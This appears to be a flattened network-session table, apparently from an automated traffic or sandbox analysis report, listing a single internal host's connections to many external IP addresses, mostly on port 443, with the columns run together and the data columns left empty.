                                                23493192.168.2.2332786209.79.14.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23494192.168.2.2342398107.163.151.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23495192.168.2.2340868142.203.105.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23496192.168.2.235176064.7.111.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23497192.168.2.2359532213.113.255.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23498192.168.2.2357778140.239.177.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23499192.168.2.233374420.33.217.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23500192.168.2.2359534201.90.223.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23501192.168.2.235851090.104.209.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23502192.168.2.2341242160.175.235.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23503192.168.2.233904262.116.22.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23504192.168.2.234310235.217.198.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23505192.168.2.2342202218.25.95.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23506192.168.2.234498423.169.39.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23507192.168.2.2333934145.103.79.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23508192.168.2.234498012.222.117.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23509192.168.2.2354668184.140.40.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23510192.168.2.235403223.128.252.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23511192.168.2.235954036.74.119.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23512192.168.2.233469688.96.203.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23513192.168.2.2332956198.4.91.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23514192.168.2.234156223.224.56.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23515192.168.2.233325090.187.209.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23516192.168.2.234784846.111.84.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23517192.168.2.2345966114.220.98.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23518192.168.2.2349122166.210.128.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23519192.168.2.2358590196.130.59.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23520192.168.2.234495296.118.249.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23521192.168.2.2350248202.94.30.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23522192.168.2.235381618.92.250.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23523192.168.2.233845283.203.166.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23524192.168.2.235301427.114.174.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23525192.168.2.234862235.66.150.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23526192.168.2.234805065.73.211.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23527192.168.2.2345308154.246.191.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23528192.168.2.2333046210.188.41.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23529192.168.2.2340918164.56.162.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23530192.168.2.235603098.23.151.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23531192.168.2.2334426135.50.8.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23532192.168.2.2349880102.203.157.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23533192.168.2.2353608189.85.6.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23534192.168.2.2346612223.32.4.918080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23535192.168.2.2341034172.65.208.748080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23536192.168.2.235205673.123.250.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23537192.168.2.234101031.22.38.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23538192.168.2.2344522105.197.224.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23539192.168.2.2341658200.9.211.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23540192.168.2.2354666177.81.167.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23541192.168.2.2359990178.34.63.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23542192.168.2.23408544.121.239.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23543192.168.2.2346824129.97.123.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23544192.168.2.2359720179.113.203.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23545192.168.2.234697231.93.88.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23546192.168.2.234053219.3.224.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23547192.168.2.2357752117.202.86.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23548192.168.2.2340330187.229.101.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23549192.168.2.235630059.20.149.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23550192.168.2.2336050181.100.181.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23551192.168.2.2358742202.4.112.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23552192.168.2.2347694165.112.1.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23553192.168.2.23449149.168.179.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23554192.168.2.2337298120.18.73.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23555192.168.2.235254243.75.185.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23556192.168.2.235813892.193.150.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23557192.168.2.2360750178.142.18.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23558192.168.2.2359466204.83.155.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23559192.168.2.2332884143.167.233.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23560192.168.2.2348664222.186.157.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23561192.168.2.233638217.134.84.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23562192.168.2.233312657.78.51.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23563192.168.2.234893483.218.0.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23564192.168.2.235348420.124.112.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23565192.168.2.235325845.120.103.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23566192.168.2.2341584159.106.94.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23567192.168.2.234807834.172.83.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23568192.168.2.2352298210.30.65.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23569192.168.2.233625693.131.132.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23570192.168.2.2360410189.35.94.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23571192.168.2.2344436221.236.145.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23572192.168.2.233450035.8.23.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23573192.168.2.234366243.111.186.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23574192.168.2.2335190182.206.55.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23575192.168.2.2343308195.53.243.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23576192.168.2.235221669.40.9.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23577192.168.2.233575459.12.50.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23578192.168.2.233491687.167.8.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23579192.168.2.2341220153.115.237.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23580192.168.2.236012827.221.76.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23581192.168.2.234269679.131.0.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23582192.168.2.2348320201.145.158.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23583192.168.2.2359632196.50.2.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23584192.168.2.2351452134.130.142.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23585192.168.2.2339480207.238.14.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23586192.168.2.234275435.123.141.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23587192.168.2.2355218213.14.168.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23588192.168.2.2346312105.59.131.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23589192.168.2.233657876.254.110.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23590192.168.2.235034688.5.83.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23591192.168.2.236098081.244.168.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23592192.168.2.2338634163.192.196.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23593192.168.2.2347668210.227.177.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23594192.168.2.2360450211.40.71.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23595192.168.2.2347898134.129.39.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23596192.168.2.235396445.189.129.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23597192.168.2.234728637.192.250.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23598192.168.2.2354428163.194.125.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23599192.168.2.2357964155.199.39.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23600192.168.2.2347764221.87.141.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23601192.168.2.234751498.155.176.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23602192.168.2.2350592210.162.87.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23603192.168.2.235470453.16.201.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23604192.168.2.2340916186.83.122.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23605192.168.2.235275023.236.180.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23606192.168.2.2347708100.214.178.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23607192.168.2.2343116203.237.103.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23608192.168.2.2339122116.108.207.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23609192.168.2.233914451.72.149.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23610192.168.2.2338356176.12.245.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23611192.168.2.233482483.64.208.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23612192.168.2.234604868.87.220.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23613192.168.2.234833857.83.1.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23614192.168.2.2334800107.207.192.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23615192.168.2.234760096.100.88.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23616192.168.2.234360863.150.247.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23617192.168.2.2353392222.48.54.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23618192.168.2.2340896218.138.127.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23619192.168.2.23431221.72.164.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23620192.168.2.2335260107.63.184.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23621192.168.2.2359518205.182.17.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23622192.168.2.233947495.182.133.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23623192.168.2.2348606141.81.90.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23624192.168.2.2360752189.133.192.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23625192.168.2.235569448.115.27.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23626192.168.2.2334266162.242.162.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23627192.168.2.2351558222.4.54.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23628192.168.2.2333514193.23.211.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23629192.168.2.2335706170.98.144.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23630192.168.2.2351554145.217.184.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23631192.168.2.234494032.19.21.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23632192.168.2.233980257.14.4.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23633192.168.2.2340840119.247.216.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23634192.168.2.2360558217.218.35.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23635192.168.2.2351442142.184.200.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23636192.168.2.2342164133.123.158.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23637192.168.2.2337916181.45.50.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23638192.168.2.235304691.25.150.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23639192.168.2.2345912122.170.47.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23640192.168.2.235587461.87.171.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23641192.168.2.234190489.165.196.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23642192.168.2.2355472107.61.142.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23643192.168.2.234050617.183.224.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23644192.168.2.2332850117.142.152.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23645192.168.2.235609658.196.177.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23646192.168.2.2339858158.82.254.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23647192.168.2.2339532138.40.152.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23648192.168.2.2335602212.113.137.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23649192.168.2.2336042210.44.195.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23650192.168.2.234385690.45.54.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23651192.168.2.233548441.4.96.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23652192.168.2.2338974111.103.9.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23653192.168.2.234554020.23.113.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23654192.168.2.2352676136.164.14.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23655192.168.2.2359448148.91.146.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23656192.168.2.2358364168.172.115.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23657192.168.2.235429474.154.127.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23658192.168.2.2333260163.14.117.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23659192.168.2.233419060.252.73.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23660192.168.2.2353342107.135.92.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23661192.168.2.234173454.150.215.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23662192.168.2.2338724206.189.88.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23663192.168.2.234186236.69.63.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23664192.168.2.2339080161.123.227.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23665192.168.2.2333192165.50.252.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23666192.168.2.236025857.247.20.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23667192.168.2.233287686.124.43.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23668192.168.2.236082893.181.189.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23669192.168.2.234979060.220.212.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23670192.168.2.2343370185.169.180.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23671192.168.2.2336748221.167.42.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23672192.168.2.233456036.67.208.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23673192.168.2.234130279.171.169.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23674192.168.2.233748413.129.153.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23675192.168.2.235147249.149.218.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23676192.168.2.2341682211.183.127.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23677192.168.2.2352774172.226.125.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23678192.168.2.233475413.122.79.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23679192.168.2.2356274159.120.231.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23680192.168.2.234681263.152.38.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23681192.168.2.236074234.179.152.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23682192.168.2.2358990200.24.214.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23683192.168.2.2360180216.33.80.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23684192.168.2.2356664146.154.119.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23685192.168.2.2353578165.36.248.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23686192.168.2.234994245.206.253.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23687192.168.2.2339370210.81.61.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23688192.168.2.2337798171.64.207.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23689192.168.2.2342172177.57.103.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23690192.168.2.2347906188.148.197.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23691192.168.2.2340544160.233.176.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23692192.168.2.233911845.41.195.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23693192.168.2.234129086.128.199.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23694192.168.2.2337594114.9.202.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23695192.168.2.2351504117.135.201.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23696192.168.2.235939674.112.227.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23697192.168.2.234495465.112.76.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23698192.168.2.23538349.71.141.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23699192.168.2.234959447.79.238.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23700192.168.2.234014681.29.11.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23701192.168.2.2347612130.74.16.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23702192.168.2.234056265.5.220.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23703192.168.2.233929646.226.206.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23704192.168.2.2338540181.65.86.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23705192.168.2.233519619.18.101.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23706192.168.2.2344704155.194.170.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23707192.168.2.236088631.228.229.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23708192.168.2.2344382217.76.66.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23709192.168.2.2358402103.143.19.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23710192.168.2.2344894124.153.197.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23711192.168.2.2343398179.232.209.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23712192.168.2.233494089.101.53.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23713192.168.2.2334966182.116.140.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23714192.168.2.2347120116.182.150.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
